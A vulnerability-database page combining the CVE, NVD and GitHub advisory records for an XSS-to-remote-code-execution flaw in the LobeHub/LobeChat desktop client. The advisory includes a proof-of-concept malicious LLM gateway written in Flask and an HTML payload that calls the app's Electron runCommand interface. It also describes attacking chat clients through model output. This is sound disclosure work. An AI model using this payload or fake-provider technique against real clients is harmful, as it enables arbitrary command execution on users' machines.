CVE-2026-42045 (GCVE-0-2026-42045)
Vulnerability from cvelistv5 – Published: 2026-05-12 16:47 – Updated: 2026-05-12 19:03
VLAI
Title
LobeHub: Cross-Site Scripting(XSS) escalate to Remote Code Execution(RCE)
Summary
LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, when LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering. If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side. Additionally, Lobechat's Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user's privileges. This vulnerability is fixed in 2.1.48.
Severity
6.2 (Medium)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/lobehub/lobehub/security/advis… | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-42045",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-12T19:03:32.451674Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-12T19:03:36.652Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "lobehub",
"vendor": "lobehub",
"versions": [
{
"status": "affected",
"version": "\u003c 2.1.48"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, when LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering. If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side. Additionally, Lobechat\u0027s Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user\u0027s privileges. This vulnerability is fixed in 2.1.48."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-12T16:47:32.636Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq"
}
],
"source": {
"advisory": "GHSA-xq4x-622m-q8fq",
"discovery": "UNKNOWN"
},
"title": "LobeHub: Cross-Site Scripting(XSS) escalate to Remote Code Execution(RCE)"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-42045",
"datePublished": "2026-05-12T16:47:32.636Z",
"dateReserved": "2026-04-23T16:05:01.709Z",
"dateUpdated": "2026-05-12T19:03:36.652Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-42045",
"date": "2026-06-03",
"epss": "0.00043",
"percentile": "0.13267"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-42045\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-12T18:17:23.637\",\"lastModified\":\"2026-05-19T18:19:44.153\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, when LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering. If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side. Additionally, Lobechat\u0027s Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user\u0027s privileges. This vulnerability is fixed in 2.1.48.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N\",\"baseScore\":6.2,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.0,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42045\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-12T19:03:32.451674Z\"}}}], \"references\": [{\"url\": \"https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-12T19:03:24.634Z\"}}], \"cna\": {\"title\": \"LobeHub: Cross-Site Scripting(XSS) escalate to Remote Code Execution(RCE)\", \"source\": {\"advisory\": \"GHSA-xq4x-622m-q8fq\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 6.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"lobehub\", \"product\": \"lobehub\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.1.48\"}]}], \"references\": [{\"url\": \"https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq\", \"name\": \"https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, when LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering. If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side. Additionally, Lobechat\u0027s Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user\u0027s privileges. This vulnerability is fixed in 2.1.48.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-12T16:47:32.636Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-42045\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-12T19:03:36.652Z\", \"dateReserved\": \"2026-04-23T16:05:01.709Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-12T16:47:32.636Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-42045
Vulnerability from fkie_nvd - Published: 2026-05-12 18:17 - Updated: 2026-05-19 18:19
Severity
Summary
LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, when LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering. If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side. Additionally, Lobechat's Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user's privileges. This vulnerability is fixed in 2.1.48.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "LobeHub is a work-and-lifestyle space to find, build, and collaborate with agent teammates that grow with you. Prior to 2.1.48, when LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering. If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side. Additionally, Lobechat\u0027s Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user\u0027s privileges. This vulnerability is fixed in 2.1.48."
}
],
"id": "CVE-2026-42045",
"lastModified": "2026-05-19T18:19:44.153",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 4.7,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-12T18:17:23.637",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-XQ4X-622M-Q8FQ
Vulnerability from github – Published: 2026-05-05 18:04 – Updated: 2026-05-13 16:25
VLAI
Summary
LobeHub has a Cross-Site Scripting issue that escalates to Remote Code Execution
Details
Summary
The vulnerability was automatically discovered by an ai agent and then manually verified.
LobeChat's message rendering mechanism has a stored cross-site scripting (XSS) vulnerability. Combined with the Electron main process's exposed insecure IPC interface, attackers can construct malicious payloads to achieve an attack chain from XSS to remote code execution (RCE).
The LobeChat team verified this vulnerability in lobehub v2.1.23, and it also exists in the latest version.
Details
When LobeChat processes custom tags in the Render process of src/features/Portal/Artifacts/Body/Renderer/index.tsx, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering.
const Renderer = memo<{ content: string; type?: string }>(({ content, type }) => {
switch (type) {
case 'application/lobe.artifacts.react': {
return <ReactRenderer code={content} />;
}
case 'image/svg+xml': {
return <SVGRender content={content} />;
}
case 'application/lobe.artifacts.mermaid': {
return <Mermaid variant={'borderless'}>{content}</Mermaid>;
}
case 'text/markdown': {
return <Markdown style={{ overflow: 'auto' }}>{content}</Markdown>;
}
default: {
return <HTMLRenderer htmlContent={content} />;
}
}
});
export default Renderer;
If an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side.
Additionally, Lobechat's Electron main process exposes an IPC interface called runCommand, used to invoke system commands. This interface allows arbitrary command execution and does not filter the command parameter. Therefore, if an attacker can obtain a handle to window.parent.electronAPI via XSS and call the runCommand method of the IPC, the ipcMain process can execute arbitrary system commands with the current user's privileges.
@IpcMethod()
async handleRunCommand({
command,
description,
run_in_background,
timeout = 120_000,
}: RunCommandParams): Promise<RunCommandResult> {
...
const childProcess = spawn(shellConfig.cmd, shellConfig.args, {
env: process.env,
shell: false,
});
...
}
PoC
The attacker launched a malicious OpenAI gateway on port 5001
from flask import Flask, Response, request, jsonify
import time
import json
app = Flask(__name__)
fake_api_key = "sk-test"
@app.route('/v1/chat/completions', methods=['POST', 'OPTIONS'])
def chat_completions():
if request.method == 'OPTIONS':
return Response(status=200, headers={
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Headers': '*'
})
# Check for API Key
auth_header = request.headers.get('Authorization')
print(auth_header)
if not auth_header or auth_header != f'Bearer {fake_api_key}':
return jsonify({"error": {"message": "Invalid API Key", "type": "invalid_request_error", "code": "invalid_api_key"}}), 401
def generate():
payload = """
<lobeArtifact type="nebula">
<img src=x onerror='window.parent.electronAPI.invoke("shellCommand.handleRunCommand", {command:"open -a Calculator"})'>
</lobeArtifact>
"""
# Split payload into chunks to simulate streaming
chunks = [payload[i:i+10] for i in range(0, len(payload), 10)]
for chunk in chunks:
data = {
"id": "chatcmpl-hpdoger-123",
"object": "chat.completion.chunk",
"created": int(time.time()),
"model": "gpt-3.5-turbo",
"choices": [{
"index": 0,
"delta": {"content": chunk},
"finish_reason": None
}]
}
yield f"data: {json.dumps(data)}\n\n"
time.sleep(0.1)
# End of stream
final_data = {
"id": "chatcmpl-hpdoger-123",
"object": "chat.completion.chunk",
"created": int(time.time()),
"model": "gpt-3.5-turbo",
"choices": [{
"index": 0,
"delta": {},
"finish_reason": "stop"
}]
}
yield f"data: {json.dumps(final_data)}\n\n"
yield "data: [DONE]\n\n"
return Response(generate(), mimetype='text/event-stream', headers={
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Headers': '*'
})
@app.route('/v1/models', methods=['GET'])
def models():
return jsonify({
"object": "list",
"data": [{
"id": "gpt-3.5-turbo",
"object": "model",
"created": 1677610602,
"owned_by": "openai"
}]
})
if __name__ == '__main__':
print("Evil OpenAI-compatible server running on http://127.0.0.1:5001")
app.run(port=5001, debug=True)
The victim opens the LobeChat application and configures an LLM Provider, entering the address of the HTTP server provided by the attacker.
The victim was exposed to an arbitrary command execution vulnerability while chatting
reproduction
For attack reproduction, refer to this video. Once the victim configures the attacker's LLM provider endpoint, arbitrary commands can be executed. Here, our demonstration opens a calculator in the victim's environment.
https://github.com/user-attachments/assets/6383e996-9148-4e88-8e25-90260104368d
Impact
Affected LobeChat clients can connect to the attacker's LLM endpoint and trigger arbitrary command execution simply by sending normal conversation messages.
Patch
A patch is available at https://github.com/lobehub/lobehub/releases/tag/v2.1.48.
Severity
6.2 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@lobehub/lobehub"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.1.26"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42045"
],
"database_specific": {
"cwe_ids": [
"CWE-78",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T18:04:53Z",
"nvd_published_at": "2026-05-12T18:17:23Z",
"severity": "MODERATE"
},
"details": "### Summary\nThe vulnerability was automatically discovered by an ai agent and then manually verified.\n\nLobeChat\u0027s message rendering mechanism has a stored cross-site scripting (XSS) vulnerability. Combined with the Electron main process\u0027s exposed insecure IPC interface, attackers can construct malicious payloads to achieve an attack chain from XSS to remote code execution (RCE).\n\nThe LobeChat team verified this vulnerability in lobehub v2.1.23, and it also exists in the latest version.\n\n### Details\nWhen LobeChat processes custom tags in the Render process of `src/features/Portal/Artifacts/Body/Renderer/index.tsx`, if no type match is found, it will choose to call the default method, HTMLRenderer, for HTML rendering.\n\n```typescript\nconst Renderer = memo\u003c{ content: string; type?: string }\u003e(({ content, type }) =\u003e {\n switch (type) {\n case \u0027application/lobe.artifacts.react\u0027: {\n return \u003cReactRenderer code={content} /\u003e;\n }\n\n case \u0027image/svg+xml\u0027: {\n return \u003cSVGRender content={content} /\u003e;\n }\n\n case \u0027application/lobe.artifacts.mermaid\u0027: {\n return \u003cMermaid variant={\u0027borderless\u0027}\u003e{content}\u003c/Mermaid\u003e;\n }\n\n case \u0027text/markdown\u0027: {\n return \u003cMarkdown style={{ overflow: \u0027auto\u0027 }}\u003e{content}\u003c/Markdown\u003e;\n }\n\n default: {\n return \u003cHTMLRenderer htmlContent={content} /\u003e;\n }\n }\n});\n\nexport default Renderer;\n```\n\nIf an attacker can induce the LLM to output content containing malicious tags, an XSS vulnerability can be created on the client side.\n\nAdditionally, Lobechat\u0027s Electron main process exposes an IPC interface called `runCommand`, used to invoke system commands. This interface allows arbitrary command execution and does not filter the `command` parameter. Therefore, if an attacker can obtain a handle to `window.parent.electronAPI` via XSS and call the `runCommand` method of the IPC, the `ipcMain` process can execute arbitrary system commands with the current user\u0027s privileges.\n\n```typescript\n @IpcMethod()\n async handleRunCommand({\n command,\n description,\n run_in_background,\n timeout = 120_000,\n }: RunCommandParams): Promise\u003cRunCommandResult\u003e {\n ...\n const childProcess = spawn(shellConfig.cmd, shellConfig.args, {\n env: process.env,\n shell: false,\n });\n ...\n }\n```\n\n### PoC\nThe attacker launched a malicious OpenAI gateway on port 5001\n\n```python\nfrom flask import Flask, Response, request, jsonify\nimport time\nimport json\n\napp = Flask(__name__)\nfake_api_key = \"sk-test\"\n\n@app.route(\u0027/v1/chat/completions\u0027, methods=[\u0027POST\u0027, \u0027OPTIONS\u0027])\ndef chat_completions():\n if request.method == \u0027OPTIONS\u0027:\n return Response(status=200, headers={\n \u0027Access-Control-Allow-Origin\u0027: \u0027*\u0027,\n \u0027Access-Control-Allow-Headers\u0027: \u0027*\u0027\n })\n\n # Check for API Key\n auth_header = request.headers.get(\u0027Authorization\u0027)\n print(auth_header)\n if not auth_header or auth_header != f\u0027Bearer {fake_api_key}\u0027:\n return jsonify({\"error\": {\"message\": \"Invalid API Key\", \"type\": \"invalid_request_error\", \"code\": \"invalid_api_key\"}}), 401\n\n def generate(): \n payload = \"\"\"\n\u003clobeArtifact type=\"nebula\"\u003e\n\u003cimg src=x onerror=\u0027window.parent.electronAPI.invoke(\"shellCommand.handleRunCommand\", {command:\"open -a Calculator\"})\u0027\u003e\n\u003c/lobeArtifact\u003e\n\"\"\"\n # Split payload into chunks to simulate streaming\n chunks = [payload[i:i+10] for i in range(0, len(payload), 10)]\n \n for chunk in chunks:\n data = {\n \"id\": \"chatcmpl-hpdoger-123\", \n \"object\": \"chat.completion.chunk\", \n \"created\": int(time.time()), \n \"model\": \"gpt-3.5-turbo\", \n \"choices\": [{\n \"index\": 0, \n \"delta\": {\"content\": chunk},\n \"finish_reason\": None\n }]\n }\n yield f\"data: {json.dumps(data)}\\n\\n\"\n time.sleep(0.1)\n \n # End of stream\n final_data = {\n \"id\": \"chatcmpl-hpdoger-123\", \n \"object\": \"chat.completion.chunk\", \n \"created\": int(time.time()), \n \"model\": \"gpt-3.5-turbo\", \n \"choices\": [{\n \"index\": 0, \n \"delta\": {},\n \"finish_reason\": \"stop\"\n }]\n }\n yield f\"data: {json.dumps(final_data)}\\n\\n\"\n yield \"data: [DONE]\\n\\n\"\n\n return Response(generate(), mimetype=\u0027text/event-stream\u0027, headers={\n \u0027Access-Control-Allow-Origin\u0027: \u0027*\u0027, \n \u0027Access-Control-Allow-Headers\u0027: \u0027*\u0027\n })\n\n@app.route(\u0027/v1/models\u0027, methods=[\u0027GET\u0027])\ndef models():\n return jsonify({\n \"object\": \"list\", \n \"data\": [{\n \"id\": \"gpt-3.5-turbo\", \n \"object\": \"model\", \n \"created\": 1677610602, \n \"owned_by\": \"openai\"\n }]\n })\n\nif __name__ == \u0027__main__\u0027:\n print(\"Evil OpenAI-compatible server running on http://127.0.0.1:5001\")\n app.run(port=5001, debug=True)\n```\n\nThe victim opens the LobeChat application and configures an LLM Provider, entering the address of the HTTP server provided by the attacker.\n\n\u003cimg width=\"2048\" height=\"772\" alt=\"image\" src=\"https://github.com/user-attachments/assets/86fe8f76-d75f-4e23-a2c5-fe29b124c7a7\" /\u003e\n\nThe victim was exposed to an arbitrary command execution vulnerability while chatting\n\n\u003cimg width=\"2048\" height=\"1036\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0a84171f-ec78-4166-b7ab-298ece6b06b9\" /\u003e\n\n### reproduction\nFor attack reproduction, refer to this video. Once the victim configures the attacker\u0027s LLM provider endpoint, arbitrary commands can be executed. Here, our demonstration `opens a calculator` in the victim\u0027s environment.\n\nhttps://github.com/user-attachments/assets/6383e996-9148-4e88-8e25-90260104368d\n\n### Impact\nAffected LobeChat clients can connect to the attacker\u0027s LLM endpoint and trigger arbitrary command execution simply by sending normal conversation messages.\n\n### Patch\nA patch is available at https://github.com/lobehub/lobehub/releases/tag/v2.1.48.",
"id": "GHSA-xq4x-622m-q8fq",
"modified": "2026-05-13T16:25:25Z",
"published": "2026-05-05T18:04:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lobehub/lobehub/security/advisories/GHSA-xq4x-622m-q8fq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42045"
},
{
"type": "PACKAGE",
"url": "https://github.com/lobehub/lobehub"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "LobeHub has a Cross-Site Scripting issue that escalates to Remote Code Execution"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…